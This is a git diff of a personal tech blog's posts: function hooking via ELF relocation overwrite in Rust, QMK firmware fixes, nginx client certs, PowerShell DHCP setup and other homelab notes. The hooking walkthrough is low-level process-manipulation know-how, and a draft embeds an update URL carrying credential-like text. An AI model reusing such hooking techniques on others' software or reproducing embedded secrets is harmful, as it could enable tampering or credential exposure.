Start Addr End Addr Size Offset objfile
|
||||||
|
0x555555554000 0x555555581000 0x2d000 0x0 /home/jade/dev/pwintln/target/release/pwintln
|
||||||
|
0x555555581000 0x555555668000 0xe7000 0x2d000 /home/jade/dev/pwintln/target/release/pwintln
|
||||||
|
0x555555668000 0x5555556d1000 0x69000 0x114000 /home/jade/dev/pwintln/target/release/pwintln
|
||||||
|
< ... ... ... >
|
||||||
|
(gdb) x/gx 0x555555554000 + 0x1a1ef0
|
||||||
|
0x5555556f5ef0: 0x00007ffff7ec4f50
|
||||||
|
(gdb) x/10i 0x00007ffff7ec4f50
|
||||||
|
0x7ffff7ec4f50 <write>: endbr64
|
||||||
|
0x7ffff7ec4f54 <write+4>: mov eax,DWORD PTR fs:0x18
|
||||||
|
0x7ffff7ec4f5c <write+12>: test eax,eax
|
||||||
|
0x7ffff7ec4f5e <write+14>: jne 0x7ffff7ec4f70 <write+32>
|
||||||
|
0x7ffff7ec4f60 <write+16>: mov eax,0x1
|
||||||
|
0x7ffff7ec4f65 <write+21>: syscall
|
||||||
|
0x7ffff7ec4f67 <write+23>: cmp rax,0xfffffffffffff000
|
||||||
|
0x7ffff7ec4f6d <write+29>: ja 0x7ffff7ec4fc0 <write+112>
|
||||||
|
0x7ffff7ec4f6f <write+31>: ret
|
||||||
|
0x7ffff7ec4f70 <write+32>: sub rsp,0x28
|
||||||
|
```
|
||||||
|
|
||||||
|
So, we know what we want to hack and how we want to hack it, but how do we find
|
||||||
|
these pointers exactly? Well, we could [consult
|
||||||
|
StackOverflow](https://stackoverflow.com/a/27304692) but the answer is some
|
||||||
|
fairly ugly C.
|
||||||
|
|
||||||
|
Rust will mostly save us from much of the uglier pointer code, and the
|
||||||
|
[`goblin`](https://docs.rs/goblin) crate makes a lot of the ELF code much
|
||||||
|
more pleasant.
|
||||||
|
|
||||||
|
Linux provides us the libc function `getauxval(3)`, which will retrieve various
|
||||||
|
bits of information that the kernel's ELF loader thinks were good. The most
|
||||||
|
relevant one to figuring out where our program is loaded is
|
||||||
|
`getauxval(AT_PHDR)`, which gives us the address of our `Elf64_Phdr` structure,
|
||||||
|
which will in turn have its own virtual address offset from the base. We can
|
||||||
|
subtract that offset to get the base of where our executable was loaded.
|
||||||
|
|
||||||
|
Side note: if you want to read preprocessor-infested C code and headers as
|
||||||
|
their concrete representation, you can do something like this:
|
||||||
|
|
||||||
|
```
|
||||||
|
~ » cpp /usr/include/link.h | grep -B10 Elf64_Phdr
|
||||||
|
typedef struct
|
||||||
|
{
|
||||||
|
Elf64_Word p_type;
|
||||||
|
Elf64_Word p_flags;
|
||||||
|
Elf64_Off p_offset;
|
||||||
|
Elf64_Addr p_vaddr;
|
||||||
|
Elf64_Addr p_paddr;
|
||||||
|
Elf64_Xword p_filesz;
|
||||||
|
Elf64_Xword p_memsz;
|
||||||
|
Elf64_Xword p_align;
|
||||||
|
} Elf64_Phdr;
|
||||||
|
```
|
||||||
|
|
||||||
|
Once we have that header, we can calculate memory addresses to other structures
|
||||||
|
in the ELF. I use
|
||||||
|
[`dyn64::from_phdrs(base: usize, headers: &[ProgramHeader])`](https://docs.rs/goblin/0.2.3/goblin/elf/dynamic/dyn64/fn.from_phdrs.html)
|
||||||
|
which looks for a program header with `p_type == PT_DYNAMIC`, then uses that
|
||||||
|
address and length to make a slice of `Dyn` (`Elf64_Dyn` in C) structures.
|
||||||
|
|
||||||
|
This is a pile of tagged pointers to various bits related to dynamic linking:
|
||||||
|
|
||||||
|
```
|
||||||
|
dev/pwintln » readelf -d target/debug/pwintln
|
||||||
|
|
||||||
|
Dynamic section at offset 0x4bb6c8 contains 32 entries:
|
||||||
|
Tag Type Name/Value
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [libgcc_s.so.1]
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [ld-linux-x86-64.so.2]
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [libm.so.6]
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [libpthread.so.0]
|
||||||
|
0x0000000000000001 (NEEDED) Shared library: [libdl.so.2]
|
||||||
|
0x000000000000000c (INIT) 0x68000
|
||||||
|
0x000000000000000d (FINI) 0x3a9424
|
||||||
|
0x0000000000000019 (INIT_ARRAY) 0x490f00
|
||||||
|
0x000000000000001b (INIT_ARRAYSZ) 16 (bytes)
|
||||||
|
0x000000000000001a (FINI_ARRAY) 0x490f10
|
||||||
|
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
|
||||||
|
0x000000006ffffef5 (GNU_HASH) 0x340
|
||||||
|
0x0000000000000005 (STRTAB) 0xad0
|
||||||
|
0x0000000000000006 (SYMTAB) 0x368
|
||||||
|
0x000000000000000a (STRSZ) 1331 (bytes)
|
||||||
|
0x000000000000000b (SYMENT) 24 (bytes)
|
||||||
|
0x0000000000000015 (DEBUG) 0x0
|
||||||
|
0x0000000000000003 (PLTGOT) 0x4bc908
|
||||||
|
0x0000000000000002 (PLTRELSZ) 96 (bytes)
|
||||||
|
0x0000000000000014 (PLTREL) RELA
|
||||||
|
```
|
||||||
|
|
||||||
|
For whatever reason, when they are actually loaded into memory, they are
|
||||||
|
resolved to actual pointers rather than the offsets we see here. In any case,
|
||||||
|
this is how you find the various bits you need next:
|
||||||
|
|
||||||
|
- dynamic symbol table
|
||||||
|
- string table
|
||||||
|
- Rela relocations table (`.rela.dyn`)
|
||||||
|
|
||||||
|
We can walk through the `Rela` table (storing tuples of `(offset, info,
|
||||||
|
addend)`), an array of `Elf64_Rela` in C, to find the symbol we're looking for.
|
||||||
|
To find things in it, such as our `write` we want to hack, we have to resolve
|
||||||
|
the names of the symbols, so let's get started on that.
|
||||||
|
|
||||||
|
The `info` field is a packed 64 bit integer with the index into the symbol
|
||||||
|
table in the upper 32 bits. The rest of the structure we can just ignore.
|
||||||
|
|
||||||
|
Once we index into the symbol table (which mysteriously doesn't seem to have
|
||||||
|
any terribly accessible way to get a length for?? This project was intended as
|
||||||
|
a joke so I used more unsafe ✨✨), we can get a symbol record.
|
||||||
|
|
||||||
|
These symbol records (`Elf64_Sym`) have `st_name` and a bunch of other fields
|
||||||
|
we don't really care about. But, since this is ELF, there's more indirection!
|
||||||
|
The `st_name` is an offset into the strings table, which is a big packed
|
||||||
|
blob of null-terminated C strings. So, we either use some C string functions or
|
||||||
|
let `goblin`'s `Strtab` abstraction deal with it for us, to get the actual
|
||||||
|
string.
|
||||||
|
|
||||||
|
Now that we have the string, we can reject all the symbols we aren't looking
|
||||||
|
for.
|
||||||
|
|
||||||
|
We have reached the home stretch of getting the pointer we were looking for,
|
||||||
|
the offset of which is in the `Rela` from earlier, which we can add to the
|
||||||
|
program base to get our pointer.
|
||||||
|
|
||||||
|
Whew.
|
||||||
|
|
||||||
|
------------------
|
||||||
|
|
||||||
|
## Replacing the function with our own
|
||||||
|
|
||||||
|
This part is much easier. We need to write an `extern "C"` function in Rust
|
||||||
|
that has the same signature as `write(2)` in `libc` (note that at this machine
|
||||||
|
level, there is no type system; so if we mess up, it might crash horribly or
|
||||||
|
do other UB. Fun!)
|
||||||
|
|
||||||
|
Once we have this function, we can replace it by putting a pointer to it at the
|
||||||
|
address we found earlier. This might require redoing the memory protection on
|
||||||
|
the page with `mprotect(2)` to allow reading and writing to it, because
|
||||||
|
"security" or some other similar good idea.
|
||||||
|
|
||||||
|
Store off the address to the real `write(2)` into some static (bonus points for
|
||||||
|
atomics), and replace the existing pointer.
|
||||||
|
|
||||||
|
We can then implement the wrapper using the function pointer we squirreled
|
||||||
|
away, to do whatever nefarious things we want.
|
||||||
|
|
||||||
|
uwu ✨
|
||||||
|
|
||||||
|
The crate I am writing this post on is [on
|
||||||
|
GitHub here](https://github.com/lf-/pwintln). Have fun in your future binary
|
||||||
|
spelunking adventures!
|
||||||
104
content/posts/qmk-hacking.md
Normal file
104
content/posts/qmk-hacking.md
Normal file
|
|
@ -0,0 +1,104 @@
|
||||||
|
+++
|
||||||
|
date = "2020-05-22"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/qmk-hacking"
|
||||||
|
tags = ["qmk", "keyboards", "software"]
|
||||||
|
title = "What I learned doing some casual QMK hacking"
|
||||||
|
featuredImage = "../images/new-keyboard.jpg"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I recently acquired a new keyboard, which was a Whole Thing (tm) as I ordered
|
||||||
|
it right at the end of Chinese New Year's, in time for the entire country to be
|
||||||
|
locked down for COVID-19 reasons so it ended up turning up yesterday, three
|
||||||
|
months later. It's a KBDFans DZ60 in an extremely normal layout, with Kailh Box
|
||||||
|
Brown switches. I bought it to replace my Unicomp keyboard which was mostly
|
||||||
|
fitting requirements but was taking up too much space on my desk, only properly
|
||||||
|
handles two keypresses at once, which is annoying for even the minimal gaming I
|
||||||
|
do.
|
||||||
|
|
||||||
|
The main attraction of this keyboard is that it runs qmk firmware, the same
|
||||||
|
software I run on my [macro pad](./i-designed-and-built-a-mechanical-macropad-numpad),
|
||||||
|
meaning I can do pretty extensive firmware modifications to it. For instance,
|
||||||
|
on that device, I implemented an autoclicker in firmware. It allows for
|
||||||
|
multipurpose keys such as using caps lock as escape and control in firmware
|
||||||
|
such that there are no issues with some applications using raw input as I
|
||||||
|
experienced while using [`uncap`](https://github.com/susam/uncap).
|
||||||
|
|
||||||
|
One major feature I wanted to bring over from the macro pad project was the
|
||||||
|
custom static light patterns. This is a feature that qmk itself doesn't have a
|
||||||
|
fantastic story for, so I had to implement it for myself on that platform.
|
||||||
|
However, my existing implementation had several annoying flaws: at anything
|
||||||
|
except the lowest brightness, the colours were very washed out (bug), it
|
||||||
|
sometimes got confused and emitted bad output, which was exacerbated by the new
|
||||||
|
board having 16 LEDs.
|
||||||
|
|
||||||
|
The existing system used a qmk function designed for typical use cases for
|
||||||
|
setting individual RGB LEDs such as for indicating whether the various lock
|
||||||
|
keys are on. This had a bug in it which I was very confused about on the
|
||||||
|
initial implementation on my macro pad: sometimes the LEDs would not turn on as
|
||||||
|
they should, or they would skip some. However, this was only exposed because I
|
||||||
|
had accidentally activated on both key press and release events on my custom
|
||||||
|
keys, causing the light updates to be hit in quick succession. Once I fixed
|
||||||
|
that unrelated bug, I thought it was fixed. This bug returned on the new
|
||||||
|
system, yet when I introduced debug statements to see what the LEDs were being
|
||||||
|
set to, it stopped happening, though I found another bug.
|
||||||
|
|
||||||
|
Learning 1: negative values for unsigned types in C behave differently than I
|
||||||
|
expected. I was using -1 as a sentinel value for LEDs which are off since it
|
||||||
|
was outside the range I believed the variable had. However, for some reason, it
|
||||||
|
was failing to hit a branch based on that value. I need to further investigate
|
||||||
|
this, it might have something to do with literal type.
|
||||||
|
|
||||||
|
About this time, I remembered the issue on the macro pad implementation and
|
||||||
|
assumed it was a timing issue since it happened less with the debug prints, so
|
||||||
|
I added delays which fixed the problem. Talking with some very helpful people
|
||||||
|
on the qmk Discord, I learned that the function I was using to set the LED
|
||||||
|
values was sending out the entire string of LEDs' values on every call, which
|
||||||
|
was unnecessary since I was updating all of them and it would suffice to send
|
||||||
|
them all at once. I had read the source code for the LED system but thought I
|
||||||
|
could not interact closely enough with the internals to do this update all at
|
||||||
|
once, however, since I was working with it last, [that possibility was even
|
||||||
|
documented](https://docs.qmk.fm/#/feature_rgblight?id=low-level-functions).
|
||||||
|
|
||||||
|
Learning 2: if something is confusing, ask about it and reread the code again.
|
||||||
|
I thought that the internal state of this module was not `extern` when it
|
||||||
|
actually was, enabling me to set the LED states then send them all at once by
|
||||||
|
working with a lower-level API.
|
||||||
|
|
||||||
|
There still remained the issue of the desaturated colours. I was struggling
|
||||||
|
with this on the previous implementation and just assumed that the LEDs were
|
||||||
|
really bad at colour reproduction. Eventually after reading some documentation,
|
||||||
|
I noticed that the qmk project ships with constants for various colours and
|
||||||
|
they were -completely- different from the ones I was using. For context, the
|
||||||
|
light pattern feature uses Hue-Saturation-Value colours so that brightness can
|
||||||
|
be adjusted by changing the value component while retaining the same colour.
|
||||||
|
Typically, this is represented with hue as a rotation of the colour wheel from
|
||||||
|
0 to 360 degrees, a saturation of 0-100% and a value from 0-100%. If I had
|
||||||
|
looked at the data types that the functions accepted more closely, I would have
|
||||||
|
likely noticed that the hue was a uint8_t, too small to represent the 360
|
||||||
|
degrees. However, I neglected to do that and instead passed in a uint16_t which
|
||||||
|
was truncated much to my confusion when all my colours were wrong.
|
||||||
|
|
||||||
|
Learning 3: When calling C APIs, quickly use `ctags` to double check the
|
||||||
|
parameter types. C has very loose casting rules that can permit bugs and
|
||||||
|
misunderstandings to compile when they should not.
|
||||||
|
|
||||||
|
Learning 3.5: Apparently you can using floating point in constants in C without
|
||||||
|
requiring that the entire program be compiled with floating point. This was
|
||||||
|
useful for converting colour ranges without pointless loss of precision by
|
||||||
|
multiplying by the ratio with floating point, then casting it back to an
|
||||||
|
integer. I confirmed this with [godbolt.org](https://godbolt.org) and staring
|
||||||
|
momentarily at the generated assembly.
|
||||||
|
|
||||||
|
I fixed my colours so they were the right hue, but they still were just various
|
||||||
|
shades of white. This is where I stared at the constants again and realized
|
||||||
|
that *both hue and saturation* were values from 0-255 in qmk. Oops. Another
|
||||||
|
scaling to the rescue. The lack of obvious indication that the values had this
|
||||||
|
range in the documentation is probably a flaw and I intend to submit a patch to
|
||||||
|
fix it.
|
||||||
|
|
||||||
|
Why would I do all this work? I wanted to practice my C. Also, putting pride
|
||||||
|
flags in unusual places is fun and validating.
|
||||||
|
|
||||||
|
You can look at the source of my changes [on
|
||||||
|
GitHub](https://github.com/lf-/qmk_firmware/tree/em-dz60)
|
||||||
33
content/posts/rewriting-the-blog-in-gatsby.md
Normal file
33
content/posts/rewriting-the-blog-in-gatsby.md
Normal file
|
|
@ -0,0 +1,33 @@
|
||||||
|
+++
|
||||||
|
date = "2019-11-11"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/rewriting-the-blog-in-gatsby"
|
||||||
|
tags = ["web", "javascript"]
|
||||||
|
title = "Rewriting the blog in Gatsby"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I just rewrote the formerly-Ghost blog in Gatsby, which may improve performance, will definitely improve image loading, and will substantially simplify maintenance. A significant motivation was that maintaining a database is a pain, especially on Arch Linux where I have to do migrations on a somewhat unplanned schedule on pace with the release schedule of the database system. Another further annoyance is that if I don't update my Ghost version, there is potential for security vulnerabilities and server compromise. It's not as bad as WordPress, being written in NodeJS, but it is still a risk.
|
||||||
|
|
||||||
|
<!-- excerpt -->
|
||||||
|
|
||||||
|
It's a significant improvement to no longer have dynamic code running server side and be able to just ship a pile of static code, which I can version using git and update the core when I want without substantial concern for security issues.
|
||||||
|
|
||||||
|
In summary, getting rid of the server side stuff:
|
||||||
|
- saves sysadmin time
|
||||||
|
- eliminates attack surface
|
||||||
|
- eliminates services such as database and email
|
||||||
|
- improves versioning and resilience to data loss by inherently having backups
|
||||||
|
- produces a more comfortable paradigm to develop for due to substantially better tooling
|
||||||
|
- avoids the need to remake my obsolescent Ghost theme that lacks support for the latest Ghost features
|
||||||
|
|
||||||
|
I chose Gatsby because it makes it easy to abstract away modern web stuff such as image processing/compression, but more importantly is gratuitously novel and thus fun to develop with.
|
||||||
|
|
||||||
|
This theme is based on [gatsby-starter-julia](https://github.com/niklasmtj/gatsby-starter-julia), with modifications including adding a dark theme, featured images, adding support for non-post pages such as the About page here, changing a bunch of styles, and setting up image compression stuff.
|
||||||
|
|
||||||
|
Gatsby was also chosen so I could write posts in Markdown in my preferred editor.
|
||||||
|
|
||||||
|
### Importing posts
|
||||||
|
|
||||||
|
I had a bunch of existing content I wanted to migrate over, and I didn't really want to do manual work for each post, with the associated possibility for error. There didn't seem to be any options for those who just want to replace Ghost with plain Markdown within the Gatsby ecosystem, though there seem to be a lot of resources for headless Ghost. However, I noticed there is [ghostToHugo](https://github.com/jbarone/ghostToHugo) which can dump the posts out of a Ghost export and turn them all into Markdown with proper frontmatter. This was sort of annoying to use because I had to install Hugo, make a site, then run the program to convert all the posts from the Ghost backup, then pull all the Markdown files out of that site and move them to Gatsby.
|
||||||
|
|
||||||
|
Also, somewhat annoyingly, since Hugo uses `toml` for its frontmatter, I needed to adjust the configuration of `gray-matter` in order to get it to parse `toml` rather than `yaml`, which was a large amount of documentation-reading but feasible.
|
||||||
|
|
@ -0,0 +1,64 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["homelab", "nginx", "tls"]
|
||||||
|
date = 2016-10-13T06:27:13Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/setting-up-client-certs-for-secure-remote-access-to-home-lab-services"
|
||||||
|
tags = ["homelab", "nginx", "tls"]
|
||||||
|
title = "Setting up client certs for secure remote access to home lab services"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Because I have some masochistic tendencies at times, I decided that it was a *totally good idea*™ to set up client certificate authentication to secure remote access to my lab services such as Grafana or Guacamole.
|
||||||
|
|
||||||
|
Unsurprisingly, since it's a rather uncommonly used finicky authentication method, there were problems. There were quite a few.
|
||||||
|
|
||||||
|
I'm writing this post mostly just for myself if I ever do this again, because it felt like it took too long to accomplish.
|
||||||
|
|
||||||
|
First, the list of requirements:
|
||||||
|
|
||||||
|
* Should allow access without certs on the local network
|
||||||
|
|
||||||
|
* Should use nginx
|
||||||
|
|
||||||
|
The latter was pretty easy, since I'm most familiar with nginx, however the former was rather interesting. I realized that, to implement this, I need to set verification as optional, then enforce it manually. This meant modifying the back ends (meaning maintaining patches, nope!) or doing it within nginx.
|
||||||
|
|
||||||
|
One issue is that nginx has if statements that are rather strange, presumably due to simplistic grammar while parsing the configuration. There is no way to do an and statement without hacks. The hack that I chose to use was some variable concatenation (which cannot be done in a single line on the if statement, it must be in its own separate if statement). Here's how I enforce certs from non-LAN hosts:
|
||||||
|
|
||||||
|
if ( $ssl_client_verify != "SUCCESS" ) {
|
||||||
|
set $clientfail "F";
|
||||||
|
}
|
||||||
|
if ( $client_loc = "OUT" ) {
|
||||||
|
set $clientfail "${clientfail}F";
|
||||||
|
}
|
||||||
|
if ( $clientfail = "FF" ) {
|
||||||
|
return 401;
|
||||||
|
}
|
||||||
|
|
||||||
|
`$client_loc` is defined in a geo block:
|
||||||
|
|
||||||
|
geo $client_loc {
|
||||||
|
default OUT;
|
||||||
|
10.10.0.0/16 IN;
|
||||||
|
10.11.0.0/16 IN;
|
||||||
|
}
|
||||||
|
|
||||||
|
But defining `ssl_client_certificate` and setting up the clients would be too easy. In setting this up, I learned that nginx has an error message: "The SSL certificate error". Yes. That's an error message. It's so bad that it could be written by Microsoft. Fortunately, it's very simple to just write an `error_log logs/debug.log debug` and get some slightly less cryptic details.
|
||||||
|
|
||||||
|
The big thing that tripped me up with the server setup was that `ssl_verify_depth` is set by default such that with a Root→Intermediate→Client hierarchy, clients fail to be verified. Set it to something like 3 and it will work.
|
||||||
|
|
||||||
|
Next, for the certificate setup:
|
||||||
|
|
||||||
|
The server directive `ssl_client_certificate` needs to point to a chain certificate file, or else it will fail with an error that suggests problems with the server certificate (thankfully).
|
||||||
|
|
||||||
|
The clients (for now, Chrome on Linux), need a pkcs12 file with some chain like stuff in it. Generate one with something like:
|
||||||
|
|
||||||
|
openssl pkcs12 -in client-chain.cert.pem -out client.pfx -inkey client.key.pem -export
|
||||||
|
|
||||||
|
where `client-chain.cert.pem` is a full chain from client to root CA and `client.key.pem` is a key file.
|
||||||
|
|
||||||
|
The other issue with the clients was that they didn't trust my CA that was imported as part of the pfx file to authenticate servers. This was quickly solved with a trip to the CA tab in the Chrome cert settings.
|
||||||
|
|
||||||
|
The client certs used in this were from my CA and have the Client Authentication property enabled.
|
||||||
|
|
||||||
42
content/posts/setting-up-dhcp-on-a-dc.md
Normal file
42
content/posts/setting-up-dhcp-on-a-dc.md
Normal file
|
|
@ -0,0 +1,42 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["PowerShell", "Active Directory", "dhcp", "dns"]
|
||||||
|
date = 2015-11-14T22:20:48Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/setting-up-dhcp-on-a-dc"
|
||||||
|
tags = ["PowerShell", "Active Directory", "dhcp", "dns"]
|
||||||
|
title = "Setting up DHCP on a DC with secure dynamic DNS"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
So, in my virtual homelabbing, I decided I was going to get a Windows based network set up with more or less only PowerShell. In these efforts, I discovered a pretty poor pile of documentation (such as [this insanity](https://technet.microsoft.com/en-us/library/cc774834%28v=ws.10%29.aspx?f=255&MSPPError=-2147217396) where they tell you to create credentials with netsh, restart the service, then delete the credentials and restart again [optional step: wonder why it doesn't work]).
|
||||||
|
|
||||||
|
####Here's how I set it up:
|
||||||
|
#####Create AD account:
|
||||||
|
```powershell
|
||||||
|
# Get username and password for the new account (remember to include your domain!)
|
||||||
|
$cred = Get-Credential
|
||||||
|
|
||||||
|
# Create the user (it needs no special permissions)
|
||||||
|
New-ADUser -Enabled $true -SamAccountName $cred.UserName -AccountPassword $cred.Password
|
||||||
|
```
|
||||||
|
#####Make the DHCP server use it:
|
||||||
|
```powershell
|
||||||
|
# Set the credentials for the DHCP server
|
||||||
|
Set-DhcpServerDnsCredential $cred
|
||||||
|
|
||||||
|
# Restart the DHCP Server
|
||||||
|
Restart-Service DhcpServer
|
||||||
|
```
|
||||||
|
|
||||||
|
You're set!
|
||||||
|
|
||||||
|
###Bonus:
|
||||||
|
|
||||||
|
Also remember to set the DNS server to only allow secure updates!
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Set-DnsServerPrimaryZone -DynamicUpdate Secure
|
||||||
|
```
|
||||||
|
|
||||||
|
|
@ -0,0 +1,16 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2016-02-28T04:23:07Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/setting-up-dynamic-ipv4-endpoint-update-for-tunnelbroker-on-asuswrt-merlin"
|
||||||
|
title = "Setting up dynamic IPv4 endpoint update for tunnelbroker on Asuswrt-Merlin"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
This process should be simple and easy. It should be documented. Neither of these things are true.
|
||||||
|
|
||||||
|
The settings you want are:
|
||||||
|
|
||||||
|
With an update url from tunnelbroker looking like `https://you:asfkjherwrqsw@ipv4.tunnelbroker.net/nic/update?hostname=12345`,
|
||||||
|
|
||||||
|
|
@ -0,0 +1,27 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["software", "software-politics"]
|
||||||
|
date = 2019-03-31T01:14:29Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/software-should-respect-the-users-privacy-and-inform-them-of-when-an-action-they-are-taking-may-compromise-it"
|
||||||
|
tags = ["software", "software-politics"]
|
||||||
|
title = "Software that respects users' privacy must inform them if they are going to compromise it"
|
||||||
|
featuredImage = "../images/fusionleak.png"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Above is a STEP file from Autodesk Fusion 360. It contains personally identifiable information by default: it leaks their Autodesk username (in my case, my full name!) and a file path on the local computer, which could also contain the user's name as well as any other information they might have put in it. In this case, it identifies where a non-scrubbed version of this particular file is found. <!-- excerpt -->
|
||||||
|
|
||||||
|
Fusion 360 does not tell you that this information is there. It does not display it in the interface either.
|
||||||
|
|
||||||
|
This sort of metadata leaking is everywhere. For instance, I have no idea if I can get an email associated with the owner of a Google document if it is shared with me. It's not obvious if it is exposed in the UI, and if it is not, perhaps an API exposes it. This sort of issue is particularly insidious because it makes it easier to use a platform to conduct doxing attacks and makes it unclear whether people whose identities need to remain private can use a service.
|
||||||
|
|
||||||
|
Metadata is more interesting than the data itself. This is a central concept in the NSA's phone surveillance: the content of a call can be surmised particularly easily by a computer simply by considering origin, destination and duration.
|
||||||
|
|
||||||
|
The primary data in a file is usually completely generated by the user and is very unlikely to contain any PII unless they put it there themselves. Metadata on the other hand is frequently computer generated, is hard to read relative to the data itself, usually hiding in dialogs in dusty corners of the user interface, if exposed at all, and is likely to contain information about the user and their computer.
|
||||||
|
|
||||||
|
If you are writing a program which generates files or other information which will be shared, *please* consider what you store as metadata with it. Do not store local paths on the user's computer in the file because they may compromise the user's privacy. *Show* the user what metadata is on the file when they are saving it. Everywhere in the interface where taking some action may reveal information as metadata to someone else, include a small block of text indicating what information that is and why it needs to be collected. Similarly to how [rubber duck debugging](https://en.wikipedia.org/wiki/Rubber_duck_debugging) works, you may notice while you're writing that statement that you don't need to expose some of the information. As much as Apple is a harmful company to the environment and to users' ownership of their devices, I have to commend them on their choice to include a small privacy icon wherever the user is agreeing to provide some information in the provision of a service.
|
||||||
|
|
||||||
|
These metadata issues are something which really made me realize how fortunate and privileged I am to be in a situation where having my name published with CAD files is at best annoying. I can think of several people I know online for whom that would be catastrophic, and they are all from groups which have been and continue to be prejudiced against in society. If a team has people from those groups on it, it is far more likely to notice this type of privacy issue and prioritize it appropriately highly.
|
||||||
|
|
||||||
|
|
@ -0,0 +1,24 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["android", "cyanogenmod", "oneplus"]
|
||||||
|
date = 2016-03-04T05:08:07Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/swapping-back-and-menuoverview-buttons-on-android-2"
|
||||||
|
tags = ["android", "cyanogenmod", "oneplus"]
|
||||||
|
title = "Swapping Back and Menu/Overview buttons on Android"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I use a OnePlus One as my daily driver. Unfortunately, like nearly every phone on the market with capacitive buttons, they're *backwards*! I could enable software keys, but that's admitting defeat. CyanogenMod doesn't allow swapping the keys in the settings, because it would result in some pretty horrible user experience.
|
||||||
|
|
||||||
|
None of this is relevant however, because this is *Android*, and I have root:
|
||||||
|
|
||||||
|
In `/system/usr/keylayout/Generic.kl`, you can see the key mapping for all keys on the system. Simply swap the stuff in the rightmost column: `BACK` and `MENU`.
|
||||||
|
|
||||||
|
MENU is at `key 139` and BACK is at `key 158`.
|
||||||
|
|
||||||
|
I use this on the latest Cyanogen OS based on Lollipop. It works perfectly. If you want to revert this, simply do the reverse of what's written.
|
||||||
|
|
||||||
|
A little note: my blog is just stuff I need to write down for easy reference later. It's on completely random themes, although centered around technology. I should probably make a wiki for this stuff.
|
||||||
|
|
||||||
16
content/posts/the-road-to-ethical-iot.md
Normal file
16
content/posts/the-road-to-ethical-iot.md
Normal file
|
|
@ -0,0 +1,16 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2018-11-08T13:55:26Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/the-road-to-ethical-iot"
|
||||||
|
title = "The Road to Ethical IoT"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I very much subscribe to Stallman's ideas that the Internet of Stings is an oppression system, but there are also obvious benefits to having more things available to computers to automate.
|
||||||
|
|
||||||
|
The schism that currently exists between those two parties is largely because many IoT devices are fiercely proprietary devices that don't belong to the user, horrifying free software advocates. To make it worse, even those who find the lack of ownership acceptable detest the massive numbers of security issues in these systems caused by their code being quickly and poorly written, with development credentials or backdoors left intact at release.
|
||||||
|
|
||||||
|
Something must be done. An ethical IoT device must respect the user, first and foremost. Custom firmware should be allowed and encouraged, though perhaps after flipping a switch on the physical device to ensure malware doesn't take advantage of it. Network communication must be done through an audited outer layer which throws out any packets which are invalid and encrypted with the wrong key. An example of such a layer is WireGuard.
|
||||||
|
|
||||||
20
content/posts/vundle-y-u-do-dis.md
Normal file
20
content/posts/vundle-y-u-do-dis.md
Normal file
|
|
@ -0,0 +1,20 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["vim"]
|
||||||
|
date = 2015-01-18T05:43:30Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/vundle-y-u-do-dis"
|
||||||
|
tags = ["vim"]
|
||||||
|
title = "Vundle, y u do dis"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Now to start off with, I apparently can't read and feel quite stupid for wasting 30 mins of my life messing with this problem.
|
||||||
|
|
||||||
|
Recently, I decided that vim was a good idea. So I commited to not avoiding it in favor of Sublime Text (I still need to fix the html stuff so that using Sublime isn't so damn tempting) and the editor-switching stuff has been going well.
|
||||||
|
|
||||||
|
When I decided to stop stealing someone else's vimrc, I also switched to using Vundle instead of Pathogen. This ended up throwing a slew of strange errors *not even mentioning a shell* such as `Error detected while processing function vundle#installer#new..vundle#scripts#view:`. Googling this gave me a seemingly completely unrelated issue from 2010 (typical as of late sadly). After trying a few things like deleting .vim/bundle, nothing was seeming to work. So I went off to read the docs. After messing with the GitHub wiki, I realised that I'm a derp and should read properly. There was a section clearly labeled `I don't use a POSIX Shell (i.e. Bash/Sh)` to read about this.
|
||||||
|
|
||||||
|
That being said, this isn't a totally useless I'm-an-idiot post, because gmarik could do something better. There could be detection of capabilities required, so that there's a pleasant error message stating what went wrong, rather than the current state of throwing a 20 line long error lacking entirely in description of **what** failed, and where. This is also partially vim's problem, because it could state that an error happened while executing shell code or similarly useful things.
|
||||||
|
|
||||||
18
content/posts/why-do-my-bridges-not-work-1-one.md
Normal file
18
content/posts/why-do-my-bridges-not-work-1-one.md
Normal file
|
|
@ -0,0 +1,18 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["homelab", "hyper-v", "lxd", "containers", "networking"]
|
||||||
|
date = 2016-06-24T22:55:33Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
